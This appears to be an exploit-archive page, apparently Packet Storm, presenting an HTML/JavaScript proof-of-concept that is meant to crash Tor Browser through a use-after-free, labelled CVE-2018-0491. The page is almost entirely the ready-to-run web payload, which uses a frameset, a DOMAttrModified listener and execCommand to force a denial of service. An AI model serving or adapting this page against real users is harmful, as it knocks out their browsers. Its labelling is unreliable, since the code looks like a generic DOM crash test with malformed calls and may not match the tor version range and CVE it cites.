Tor Browser versions 0.3.2.x before 0.3.2.10 suffer from a use-after-free vulnerability that can result in a denial of service condition.
00d2316870f92dcf1fa407e64a5f3768feca854ec005ecbad71e9caec5f84da0# Exploit Title: Tor Browser - Use After Free Vulnerability
# Date: 09.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: *https://www.torproject.org/ <https://www.torproject.org/>*
# Software Link:
*https://www.torproject.org/download/download-easy.html.en
<https://www.torproject.org/download/download-easy.html.en>*
# Version: Tor 0.3.2.x before 0.3.2.10
# Tested on: Kali Linux
# CVE : CVE-2018-0491
#Run exploit, result DOS
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed